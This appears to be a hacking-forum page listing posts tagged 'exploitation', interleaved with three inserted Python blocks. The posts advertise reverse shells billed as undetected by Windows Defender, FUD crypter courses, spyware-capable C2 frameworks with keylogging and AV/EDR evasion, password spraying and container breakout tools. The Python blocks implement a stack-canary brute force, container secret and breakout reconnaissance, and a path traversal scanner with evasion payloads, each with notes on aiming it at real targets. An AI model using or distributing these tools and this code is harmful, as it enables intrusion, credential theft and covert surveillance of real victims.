Showing results for tags 'exploitation'.


  1. Description Kali contains an array of tools to assist with security assessments and penetration tests. This course will teach you how to use some of those tools to exploit the systems you find, moving you into a position to perform post exploitation tasks. A large number of security tools are available to help with a penetration test and understanding how to use them is critical to make testing effective. In this course, Exploitation with Kali Linux, you’ll learn to exploit the vulnerabilities you find. First, you’ll learn how to access systems using CrackMapExec. Next, you’ll discover how to create and use payloads to initially exploit a computer. Finally, you’ll learn how to use Metasploit alone to exploit remote systems and prepare for post exploitation. When you’re finished with this course, you’ll have the skills and knowledge to comfortably exploit computers within a network. [Hidden Content] [hide][Hidden Content]]
  2. An automatic Blind ROP exploitation Python tool. Abstract: BROP (Blind ROP) is a technique found by Andrew Bittau from Stanford in 2014 (original paper, slides). Most servers like nginx, Apache and MySQL fork and then communicate with the client. This means the canary and addresses stay the same even if there is ASLR and PIE, so we can use some educated brute force to leak information and subsequently craft a working exploit. Flow of exploitation: find the buffer overflow offset; find the canary; find the saved registers (RBP / RIP); find stop gadgets; find BROP gadgets; find a write function (write / dprintf / puts / …); leak the binary. [hide][Hidden Content]]
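The first two steps of the flow above (offset, then canary), as an added example that is not the BROP tool's own code. The forking server is replaced by an in-process stand-in that behaves the way the post describes: every "connection" sees the same canary, and a wrong overwrite kills only that worker. The overflow offset (64), the canary length (8) and the seed are assumptions for the example; the same loop extends unchanged to the saved RBP/RIP step.

```python
"""Byte-by-byte stack canary brute force against a forking server (simulated).

A forked worker inherits the parent's memory image, so the canary and every
address are identical for each connection. A wrong guess crashes only the
worker and the parent keeps accepting, which turns a 64-bit secret into at
most 8 * 256 guesses.
"""
import random
from typing import Optional

CANARY_LEN = 8


class ForkingServer:
    """Constructed stand-in for a forking network service (e.g. nginx workers).

    Sending more than `overflow_offset` bytes overwrites the canary. The worker
    survives only while the overwritten bytes equal the real canary; otherwise
    it 'crashes' and the connection drops without a reply (returns None).
    """

    def __init__(self, overflow_offset: int = 64, seed: int = 1337):
        rng = random.Random(seed)
        self.overflow_offset = overflow_offset
        # glibc's canary has a 0x00 low byte; little-endian, that is the first
        # byte an overflow reaches.
        self._canary = b"\x00" + bytes(rng.randrange(256) for _ in range(CANARY_LEN - 1))
        self.connections = 0

    def handle(self, data: bytes) -> Optional[bytes]:
        self.connections += 1
        tail = data[self.overflow_offset:]
        if tail == self._canary[: len(tail)]:
            return b"ok"
        return None  # worker died


def find_overflow_offset(server: ForkingServer, max_len: int = 4096) -> int:
    """Step 1: grow the input one byte at a time until the worker dies."""
    for n in range(1, max_len + 1):
        if server.handle(b"A" * n) is None:
            return n - 1
    raise RuntimeError("no crash observed; buffer larger than max_len?")


def leak_canary(server: ForkingServer, offset: int) -> bytes:
    """Step 2: recover the canary one byte at a time.

    For each position try all 256 values; the single value that keeps the
    worker alive is the real byte. Worst case 8 * 256 connections, not 2**64.
    """
    known = b""
    while len(known) < CANARY_LEN:
        for guess in range(256):
            probe = b"A" * offset + known + bytes([guess])
            if server.handle(probe) is not None:
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte survived; offset or server model is wrong")
    return known


if __name__ == "__main__":
    srv = ForkingServer()
    off = find_overflow_offset(srv)
    canary = leak_canary(srv, off)
    print(f"offset={off} canary={canary.hex()} connections={srv.connections}")
```

Against a real target the `handle` call is a TCP connect plus send, and "crashed" is the socket closing without a reply; the probe layout is identical.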
  3. Description Learning about PowerShell exploitation techniques and tools is of vital importance for successfully running red team operations or penetration tests in Windows environments. The ability to make use of readily available tools such as PowerShell when targeting Windows operating systems during red teaming exercises is crucial to guarantee a successful outcome. In this course, Exploitation with PowerShell, you’ll learn to leverage PowerShell to your advantage when targeting Windows operating systems. First, you’ll explore various types of tools that you can work with to build evasive payloads. Next, you’ll discover how to embed these payloads into client-side exploits. Finally, you’ll learn about the various security mitigations which you may be confronted with during security operations and how to evade them. When you’re finished with this course, you’ll have the skills and knowledge required to successfully conduct pentests and red team exercises using PowerShell. [Hidden Content] [hide][Hidden Content]]
  4. This is a PowerShell reverse shell that executes the commands and/or scripts that you add to the powerreverse.ps1 file, plus a small library of post-exploitation scripts. It can also be used for post-exploitation and even lateral movement. Please use it at your own risk; I am not and will not be responsible for your actions. Also, this reverse shell is currently not detected by Windows Defender. If you want to use this, make sure to set up a Digital Ocean VPS and have the script connect back there or to your C2. Happy Hacking! Key Features:
     • Reverse Shell: simply change the IP & port and let it do its magic
     • Blue Screen Of Death (BSOD): basically calls winit.exe, gives a blue screen and shuts down the computer
     • Disable Windows Defender (needs admin priv, of course)
     • Get Computer Information
     • Disable Input (needs admin priv)
     • Disable Monitor
     • Exclude File Extensions (needs admin priv)
     • Exclude Folder (needs admin priv)
     • Exclude Process (needs admin priv)
     • Get USB History
     • GPS Location (gets the lat & long, then performs a reverse geo lookup and spits out the exact address)
     • Grab Wifi Credentials
     • Ifconfig
     • List Antivirus Running
     • List External IP
     • Logoff
     • Mayhem Window Popup
     • Send A Message Box
     • Network Scan (internal scan of the network for open ports & IPs)
     • Restart
     • Rickroll
     • Scare Window
     • Screenshot The Screen
     • System Time
     • Webcam List
     [hide][Hidden Content]]
  5. Purpose toxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js). This project started as (and still is) a research-based creative endeavor to explore the exploitability depth that an XSS vulnerability may introduce by using vanilla JavaScript, trusted certificates and cheap tricks. Disclaimer: The project is quite fresh and has not been widely tested. [hide][Hidden Content]]
  6. A fully offensive framework for 802.11 networks and protocols with different types of attacks for WPA and WEP, automated hash cracking, Bluetooth hacking, and much more. I recommend my Alfa adapter: Alfa AWUS036ACM, which works really great with both 2.4 and 5 GHz. Tested and supported in Kali Linux, Parrot OS, Arch Linux, and Ubuntu. SUPPORTED ATTACKS: Deauthentication Attack; Authentication Attack; Beacon Flood Attack; PMKID Attack; EvilTwin Attack; Passive/Stealthy Attack; Pixie Dust Attack; Null Pin Attack; Chopchop Attack; Replay Attack; Michael Exploitation Attack; Caffe-Latte Attack; Jamming, Reading and Writing Bluetooth connections; GPS Spoofing with HackRF. FEATURES: ☑️ Log generator ☑️ WPA/WPA2, WPS, and WEP Attacks ☑️ Auto handshake cracking ☑️ Multiple templates for EvilTwin attack ☑️ Check monitor mode and its status ☑️ 2 GHz and 5 GHz attacks ☑️ Custom wordlist selector ☑️ Auto detect requirements ☑️ Bluetooth support (Jamming, Reading, Writing) [hide][Hidden Content]]
  8. VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit. Overview: a very simple Python framework, inspired by SprayingToolkit, that tries to automate most of the process required to detect, enumerate and attack common O365 and VPN endpoints (like Cisco, Citrix, Fortinet, Pulse, etc.). Why I developed it: to make the VPN spraying phase much quicker and easier. Also, due to its flexibility, this tool can be added to an existing OSINT workflow pretty easily. What the tool can do for you: Vortex mainly provides assistance with performing the following tasks:
     • User Search and Collection: LinkedIn, Google, PwnDB
     • Password Leaks: PwnDB
     • Main Domain Identification: OWA, S4B/Lync, ADFS
     • Subdomain Search: Enumeration, Bruteforce
     • VPN Endpoint Detection
     • Password Spraying/Guessing attacks: O365, Lync/S4B, ADFS, IMAP, VPNs (Cisco, Citrix, Fortinet, Pulse Secure, SonicWall)
     • Search profiles on Social Networks: Instagram, Facebook, Twitter, TikTok, Onlyfans
     [hide][Hidden Content]]
  9. A post-exploitation tool written in C# that uses either CIM or WMI to query remote systems. Introduction: SharpStrike is a C# rewrite and expansion of @Matt_Grandy_'s CIMplant and @christruncer's WMImplant. SharpStrike allows you to gather data about a remote system, execute commands, exfil data, and more. The tool allows connections using Windows Management Instrumentation (WMI) or Common Interface Model (CIM); well, more accurately Windows Management Infrastructure (MI). CIMplant requires local administrator permissions on the target system. [hide][Hidden Content]]
  10. 29 downloads. Advance Exploitation Course By Umar Sabil * Make Your Server FUD - 12 Topics * Convert your Server to mp3, mp4, image * Convert your Server to TXT * Macro Word Exploit * Email spoofing Advance Techniques * Make Your Server Anti Kill * Make Your Own Crypter FUD. Download Link: Free for users PRIV8. $110 PRIV8
  11. Advance Exploitation Course By Umar Sabil * Make Your Server FUD - 12 Topics * Convert your Server to mp3, mp4, image * Convert your Server to TXT * Macro Word Exploit * Email spoofing Advance Techniques * Make Your Server Anti Kill * Make Your Own Crypter FUD. Download Link: Free for users PRIV8. Submitter: dEEpEst. Submitted: 05/09/21. Category: Online Book. Password: ********
  12. RomBuster is a router exploitation tool that allows disclosing the admin password of network routers. Features: Exploits vulnerabilities in the most popular routers such as D-Link, Zyxel, TP-Link and Huawei. Optimized to exploit multiple routers at one time from a list. Simple CLI and API usage. [hide][Hidden Content]]
  13. Offensive Software Exploitation (OSE) Course. This repository is for the Offensive Software Exploitation Course I am teaching at Champlain College and currently doing for free online (check the YouTube channel for the recordings). Most of the slide notes I used are already shared on the HTID Course, but the labs were fully created by myself. I used publicly available resources and software to explain each of the weaknesses covered, so there is nothing here that you cannot find online. Vulnerable Software: The vulnerable software I used is also online and can be found at Exploit-db. I also used Stephen Bradshaw's VulnServer, plus maybe some other simple code that I prepared. Please check each lab for the software used in that specific lab and where to download it from. Tool(s) Required: All of the tools used are free and can be downloaded from the URLs below: Immunity Debugger, Kali Linux, CFF Explorer, PE-bear, Ghidra, IDA Pro, x64dbg, Microsoft SysInternals Suite, CAPA by FireEye FLARE Team, NetCat, others! Target(s) Used: Download a Windows 10 VM from Microsoft VMs (currently using Version 1809 Build 17763.1339). This will be used for most of the labs, except for the EggHunter lab, where I used a Windows 7 VM, also from Microsoft VMs (currently offline, so check archive.org). All the targeted software is Intel/AMD 32-bit unless otherwise instructed. Table of Contents: The topics that will be covered in this course are: The Basics (PE Format, DLLs, etc.); Bug Hunting and Fuzzing; Intro. to Memory Corruption and Buffer Overflows; Metasploit; Mitigation Techniques; SEH and Jumping Strategies; Egghunter; Return Oriented Programming (ROP); Post Exploitation; Manual Code Injection; Intro. to Assembly x86 and x64 (please check update #3 for this part); Reverse Engineering (please check update #3 for this part). Video Recordings: Arabic version: Playlist; English version: Playlist. Useful Resources: The number one resource is the Corelan Team's blog, Corelan Team; Introductory Intel x86, OpenSecurityTraining. [hide][Hidden Content]]
  14. BlackMamba. BlackMamba is a multi-client C2/post-exploitation framework with some spyware features. Powered by Python 3.8.6 and the QT Framework. Some of BlackMamba's features are: Multi-Client: supports multiple client connections at the same time. Real-Time Communication Updates: real-time communication and updates between the client and server. Encrypted Communication: almost all communications are encrypted, with the exception of screen video streaming. Screenshot Gathering: get a real-time screenshot from the client. Video Streaming: watch the client screen in real time. Client Lock: lock and unlock the machine of the client. Encrypted File Transfer (upload/download): download files from the client or upload files to the client. Keylogger: register all the keys pressed by the client. Web Downloader: download files from URLs or content from raw pages. Changelog v1.0.41: New feature: enumeration of open ports. [hide][Hidden Content]]
  15. BlackMamba. BlackMamba is a multi-client C2/post-exploitation framework with some spyware features. Powered by Python 3.8.6 and the QT Framework. Some of BlackMamba's features are: Multi-Client: supports multiple client connections at the same time. Real-Time Communication Updates: real-time communication and updates between the client and server. Encrypted Communication: almost all communications are encrypted, with the exception of screen video streaming. Screenshot Gathering: get a real-time screenshot from the client. Video Streaming: watch the client screen in real time. Client Lock: lock and unlock the machine of the client. Encrypted File Transfer (upload/download): download files from the client or upload files to the client. Keylogger: register all the keys pressed by the client. Web Downloader: download files from URLs or content from raw pages. Changelog v1.0.24: New feature: enumeration of antiviruses on the client host. [hide][Hidden Content]]
  16. BlackMamba. BlackMamba is a multi-client C2/post-exploitation framework with some spyware features. Powered by Python 3.8.6 and the QT Framework. Some of BlackMamba's features are: Multi-Client: supports multiple client connections at the same time. Real-Time Communication Updates: real-time communication and updates between the client and server. Encrypted Communication: almost all communications are encrypted, with the exception of screen video streaming. Screenshot Gathering: get a real-time screenshot from the client. Video Streaming: watch the client screen in real time. Client Lock: lock and unlock the machine of the client. Encrypted File Transfer (upload/download): download files from the client or upload files to the client. Keylogger: register all the keys pressed by the client. Web Downloader: download files from URLs or content from raw pages. [hide][Hidden Content]]
  17. A high performance FortiGate SSL-VPN vulnerability scanning and exploitation tool. Requirements Tested with Parrot & Debian Operating Systems and Windows 10 [hide][Hidden Content]]
  18. SHAD0W is a modular C2 framework designed to successfully operate in mature environments. It will use a range of methods to evade EDR and AV while allowing the operator to continue using the tooling and tradecraft they are familiar with. It's powered by Python 3.8 and C, using Donut for payload generation. By using Donut alongside the process injection capabilities of SHAD0W, it gives the operator the ability to execute .NET assemblies, EXEs, DLLs, VBS, JS, or XSLs fully in memory. Dynamically resolved syscalls are heavily used to avoid userland API hooking, anti-DLL injection makes it harder for EDR to load code into the beacons, and official Microsoft mitigation methods protect spawned processes. The main features of the SHAD0W C2 are:
     • Built For Docker: it runs fully inside Docker, allowing cross-platform usage
     • Live Proxy & Mirror: the C2 server is able to mirror any website in real time, relaying all non-C2 traffic to that site, making it look less suspect when viewed in a web browser
     • HTTPS C2 Communication: all traffic between beacons and the C2 is encrypted and transmitted over HTTPS
     • Modern CLI: the CLI is built on prompt-toolkit
     • JSON Based Protocol: custom beacons can be built and used easily with an easy-to-implement protocol
     • Extremely Modular: easy to create new modules to interact with and task beacons
     The main features of SHAD0W beacons are:
     • Shellcode, EXE, Powershell & More: beacons can be generated and used in many different formats
     • Process Injection: allowing you to migrate, shinject, dllinject and more
     • Bypass AV: payloads are frequently updated to evade common anti-virus products
     • Highly configurable: custom jitters, user agents and more
     • Proxy Aware: all callbacks will use the current system proxy
     • HTTPS C2 Communication: traffic to and from the C2 is encrypted via HTTPS
     Current Modules:
     • GhostPack: with the binary compiled nightly via an Azure pipeline. Thanks to @Flangvik
     • Unmanaged Powershell: with built-in AMSI bypass
     • Ghost In The Logs: disable ETW & Sysmon; more info can be found here
     • Elevate: built-in PrivEsc exploits
     • SharpSocks: reverse socks proxy over HTTPS
     • SharpCollection: a ton of .NET offensive tools; more info can be found here
     • Mimikatz: for all your credential theft needs
     • Upload & Download: easy data exfiltration
     • StdAPI: common commands to interact with the file system
     [hide][Hidden Content]]
  19. Pown Pown.js is a security testing and exploitation toolkit built on top of Node.js and NPM. Unlike traditional security tools like Metasploit, Pown.js considers frameworks to be an anti-pattern. Therefore, each module in Pown is, in fact, a standalone NPM module allowing a greater degree of reuse and flexibility. Creating new modules is a matter of publishing to NPM and tagging them with the correct tags. The rest is handled automatically. [Hidden Content]
  20. Break out the Box (BOtB). BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies. What does it do? BOtB is a CLI tool which allows you to: exploit common container vulnerabilities; perform common container post-exploitation actions; provide capability when certain tools or binaries are not available in the container; use BOtB's capabilities with CI/CD technologies to test container deployments; perform the above in either a manual or an automated approach. Current Capabilities:
     • Find and identify UNIX domain sockets
     • Identify UNIX domain sockets which support HTTP
     • Find and identify the Docker daemon on UNIX domain sockets or on an interface
     • Analyze and identify sensitive strings in ENV and processes in the ProcFS, i.e. /proc/{pid}/environ
     • Identify metadata service endpoints, i.e. [Hidden Content], [Hidden Content] and [Hidden Content]
     • Perform a container breakout via exposed Docker daemons
     • Perform a container breakout via CVE-2019-5736
     • Hijack host binaries with a custom payload
     • Perform actions in CI/CD mode and only return exit codes > 0
     • Scrape metadata info from GCP metadata endpoints
     • Push data to an S3 bucket
     • Break out of privileged containers
     • Force BOtB to always return an exit code of 0 (useful for non-blocking CI/CD)
     • Perform the above from the CLI arguments or from a YAML config file
     • Perform reverse DNS lookup
     • Identify Kubernetes Service Account secrets and attempt to use them
     Changelog v1.8: In this release, the following is addressed: Added @initree's Keyctl pwnage to extract entries from the Linux kernel keyring ([Hidden Content]). Modified the new Keyctl code to be multi-threaded, making use of Go workers to speed up enumeration. [hide][Hidden Content]]
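Three of the recon checks listed above (sensitive strings in /proc/{pid}/environ, a Docker daemon socket reachable from inside the container, and whether the container is privileged), written out as an added example in Python; this is not BOtB's code, which is written in Go. All sample inputs are constructed to look like the real /proc files; the regexes for "sensitive" names and values, and the 38-bit threshold for a full capability set, are assumptions of the example. The metadata endpoints are not covered because the post hides their URLs.

```python
"""Container recon against embedded /proc samples, plus a live variant."""
import re
from typing import Dict, List, Optional, Tuple

# --- constructed sample inputs (shaped like the real /proc files) ---
SAMPLE_ENVIRON = (b"PATH=/usr/bin\x00HOME=/root\x00"
                  b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\x00"
                  b"DB_PASSWORD=hunter2\x00APP_MODE=prod\x00")
SAMPLE_MOUNTINFO = [
    "1234 1200 0:45 / / rw,relatime - overlay overlay rw",
    "1235 1234 0:24 /docker.sock /run/docker.sock rw,nosuid,nodev - tmpfs tmpfs rw",
    "1236 1234 0:26 / /proc rw,nosuid,nodev,noexec - proc proc rw",
]
SAMPLE_STATUS_DEFAULT = "Name:\tsh\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\n"
SAMPLE_STATUS_PRIVILEGED = "Name:\tsh\nCapEff:\t0000003fffffffff\n"

# Assumed heuristics: suspicious variable names, then well-known value shapes.
SENSITIVE_KEY_RE = re.compile(r"PASS(WD|WORD)?|SECRET|TOKEN|API[_-]?KEY|PRIVATE[_-]?KEY", re.I)
SENSITIVE_VALUE_RES = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[\w-]+\.[\w-]+\.[\w-]+"),
}
# Capability bit numbers from include/uapi/linux/capability.h; these are the
# ones that usually give a path to the host.
INTERESTING_CAPS = {2: "CAP_DAC_READ_SEARCH", 12: "CAP_NET_ADMIN", 16: "CAP_SYS_MODULE",
                    17: "CAP_SYS_RAWIO", 19: "CAP_SYS_PTRACE", 21: "CAP_SYS_ADMIN"}


def parse_environ(blob: bytes) -> Dict[str, str]:
    """/proc/<pid>/environ is NUL-separated KEY=VALUE entries."""
    env: Dict[str, str] = {}
    for entry in blob.split(b"\x00"):
        if b"=" in entry:
            k, _, v = entry.partition(b"=")
            env[k.decode(errors="replace")] = v.decode(errors="replace")
    return env


def find_secrets(env: Dict[str, str]) -> List[Tuple[str, str]]:
    """Flag a variable by suspicious name first, otherwise by value shape."""
    hits: List[Tuple[str, str]] = []
    for key, value in env.items():
        if SENSITIVE_KEY_RE.search(key):
            hits.append((key, "sensitive-name"))
            continue
        for label, rx in SENSITIVE_VALUE_RES.items():
            if rx.search(value):
                hits.append((key, label))
                break
    return hits


def docker_socket_mounts(mountinfo_lines: List[str]) -> List[str]:
    """A docker.sock bind-mounted into the container is its own mount entry;
    field 5 of /proc/self/mountinfo is the mount point."""
    return [f[4] for f in (line.split() for line in mountinfo_lines)
            if len(f) >= 5 and f[4].endswith("docker.sock")]


def parse_cap_eff(status_text: str) -> int:
    """CapEff in /proc/<pid>/status is a hex bitmask of effective capabilities."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    return int(m.group(1), 16) if m else 0


def interesting_caps(cap_eff: int) -> List[str]:
    return [name for bit, name in sorted(INTERESTING_CAPS.items()) if (cap_eff >> bit) & 1]


def looks_privileged(cap_eff: int) -> bool:
    """--privileged grants the full bounding set (38+ bits on kernels since
    4.x); Docker's default set 0xa80425fb has 14 bits. Heuristic threshold."""
    return bin(cap_eff).count("1") >= 38


def audit_container(environ: bytes, mountinfo: List[str], status: str) -> Dict[str, object]:
    cap_eff = parse_cap_eff(status)
    return {
        "secrets": find_secrets(parse_environ(environ)),
        "docker_sockets": docker_socket_mounts(mountinfo),
        "dangerous_caps": interesting_caps(cap_eff),
        "privileged": looks_privileged(cap_eff),
    }


def audit_live() -> Optional[Dict[str, object]]:
    """Same checks against the real /proc of the current process (Linux only)."""
    try:
        with open("/proc/self/environ", "rb") as f:
            environ = f.read()
        with open("/proc/self/mountinfo") as f:
            mountinfo = f.read().splitlines()
        with open("/proc/self/status") as f:
            status = f.read()
    except OSError:
        return None
    return audit_container(environ, mountinfo, status)


if __name__ == "__main__":
    print(audit_container(SAMPLE_ENVIRON, SAMPLE_MOUNTINFO, SAMPLE_STATUS_PRIVILEGED))
```

Run `audit_live()` inside a container to get the same report for the process you are in; a non-empty `docker_sockets` list or `CAP_SYS_ADMIN` in `dangerous_caps` is the signal BOtB's breakout modules key on.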
  21. Introduction Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. [hide][Hidden Content]]
  22. Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal/directory climbing vulnerabilities. It is built to be as performant as possible and to offer a wide arsenal of filter evasion techniques. How does it work? Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd with all of its evasive payloads. Analyzing the response, payloads that worked are separated from the others. Why phase separation? The separation into several phases is new in this version. It is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads always being used again despite not working for the current server. Changelog v1.5.1-3 [New Features] Tor support now for Windows, too. The Tor service must be started manually beforehand. [Bug Fixes] Fixed an issue on Windows where the tool would crash for targets with a custom port or BasicAuth, because ":" is not an allowed directory character. Fixed terminal output flood during attack by providing an extra progress function. Color output should work now on Windows; please report back if it still doesn't. [hide][Hidden Content]]
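The two-phase idea described above, as an added example that is not Vailyn's own code: phase 1 fires every evasion variant at /etc/passwd and keeps only the variants that got through, phase 2 reads further files with just those. The target is a constructed handler with a typical weak filter (one URL decode, a single non-recursive strip of `../`, backslash normalisation after the filter), the variant list is a small assumed subset of what the tool ships, and the climb depth of 3 is an assumption matching the constructed web root.

```python
"""Two-phase path traversal scan against a constructed vulnerable handler."""
import posixpath
import re
from typing import Callable, Dict, List
from urllib.parse import unquote

# Constructed target filesystem (the real tool reads HTTP responses instead).
FAKE_FS: Dict[str, str] = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/etc/hostname": "webhost01\n",
    "/var/www/html/index.html": "<html>index</html>",
}
WEBROOT = "/var/www/html"  # three levels deep, so depth=3 reaches /
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)  # phase-1 oracle

# Evasion variants of one "../" step. Assumed list for the example; Vailyn
# ships its own, much larger set.
VARIANTS: List[str] = [
    "../",              # plain
    "..%2f",            # URL-encoded slash
    "%2e%2e/",          # URL-encoded dots
    "%252e%252e%252f",  # double URL-encoded
    "....//",           # survives a single global strip of "../"
    "..\\",             # backslash, normalised by some servers
]


def vulnerable_target(param: str) -> str:
    """Constructed handler: one decode, non-recursive '../' strip, backslash
    normalisation, then a file read relative to the web root."""
    p = unquote(param)
    p = p.replace("../", "")        # flawed filter: "....//" collapses to "../"
    p = p.replace("\\", "/")        # normalisation happens after the filter
    resolved = posixpath.normpath(posixpath.join(WEBROOT, p))
    return FAKE_FS.get(resolved, "404 Not Found")


class TwoPhaseScanner:
    """Phase 1 learns which variants beat the filter (using /etc/passwd as the
    oracle); phase 2 reads further files with only those variants."""

    def __init__(self, send: Callable[[str], str], depth: int):
        self.send = send
        self.depth = depth
        self.requests = 0

    def _fetch(self, variant: str, path: str) -> str:
        self.requests += 1
        return self.send(variant * self.depth + path.lstrip("/"))

    def phase1(self) -> List[str]:
        return [v for v in VARIANTS if PASSWD_RE.search(self._fetch(v, "/etc/passwd"))]

    def phase2(self, working: List[str], paths: List[str]) -> Dict[str, str]:
        found: Dict[str, str] = {}
        for path in paths:
            for v in working:
                body = self._fetch(v, path)
                if body != "404 Not Found":
                    found[path] = body
                    break  # first working variant is enough for this file
        return found


def run_scan(depth: int = 3) -> Dict[str, object]:
    s = TwoPhaseScanner(vulnerable_target, depth)
    working = s.phase1()
    after_p1 = s.requests
    loot = s.phase2(working, ["/etc/hostname", "/etc/shadow"])
    return {"working": working, "loot": loot,
            "requests_phase1": after_p1, "requests_phase2": s.requests - after_p1}


if __name__ == "__main__":
    print(run_scan())
```

Without the phase split every file would cost six requests here; after phase 1 a hit costs one and a miss costs two, which is the overhead the changelog is talking about. Swap `vulnerable_target` for a function that performs the HTTP request and returns the body to point this at a real endpoint.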
  23. Introduction: CMSeeK is a CMS detection and exploitation tool, written in Python3, capable of scanning numerous content management systems including WordPress, Joomla, Drupal, etc. It allows you to run both simple CMS detection and deep scans, as well as multisite scans. Currently it can be run on any Unix-based system (Linux, OS X), but soon it'll be available for Windows, too. Features: CMSeeK can perform basic CMS detection for plenty of different CMS (150+). Capable of advanced WordPress scans: plugin, user and theme enumeration; version and user detection (3 different detection modes); version vulnerability detection, etc. Besides WordPress version detection, it can detect the Drupal version. Capable of advanced Joomla scans: admin page and backup file finder; core vulnerability and config leak detection; directory listing checks, etc. It has a modular brute-force system: you can use pre-made modules or create your own and integrate them within the CMSeeK system. And so much more. Version 1.1.3 updates: Release Date: 25th July 2020. Added new CMS: Smartstore, Solusquare Commerce Cloud, Spree, Brightspot CMS, Amiro.CMS, Weebly, ekmPowershop, GoDaddy Website Builder, WHMCS, Zen Cart, OpenNemas CMS, IPO CMS. Version detection added for: Amiro.CMS, GoDaddy Website Builder. Added WordPress bruteforce via XML-RPC. Improved logging for Joomla scans. Improved logging for WordPress deep scan. Switched to wpvulns.com for WordPress vulnerabilities. Added --light-scan argument. Added (--only-cms, -o) argument. [hide][Hidden Content]]
  24. Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header. Changelog Version 3.1: Fixed: Multiple bug-fixes regarding several reported unhandled exceptions. Added: A script "setup.py" has been added (i.e. easier installation). Revised: Improvement regarding checking if the provided value has boundaries (e.g. 'param=/value/'). Revised: Improvement regarding the dynamic code evaluation technique's heuristic checks. Revised: Improvement regarding identifying the indicated web-page charset. Revised: Minor improvement regarding verbose mode (i.e. debug messages). Fixed: Bug-fix regarding Basic HTTP authentication. Revised: Minor improvement regarding the redirection mechanism. Fixed: Bug-fix regarding defining the wildcard character "*" in nested JSON objects. Revised: Minor improvement regarding the Flatten_json (third party) module. Revised: Minor improvement regarding parsing nested JSON objects. Added: New tamper script "doublequotes.py" that adds double-quotes ("") between the characters of the generated payloads (for *nix targets). Fixed: Bug-fix regarding parsing raw HTTP headers from a file (i.e. -r option). Revised: Improvements regarding data in the detailed message about an occurred unhandled exception. Revised: Minor bug-fixes and improvements regarding the HTTP authentication dictionary-based cracker. [hide][Hidden Content]]
  25. Introduction Bashark aids pentesters and security researchers during the post-exploitation phase of security audits. Features Single Bash script Lightweight and fast Multi-platform: Unix, OSX, Solaris etc. No external dependencies Immune to heuristic and behavioural analysis Built-in aliases of often used shell commands Extends system shell with post-exploitation oriented functionalities Stealthy, with custom cleanup routine activated on exit Easily extensible (add new commands by creating Bash functions) Full tab completion [HIDE][Hidden Content]]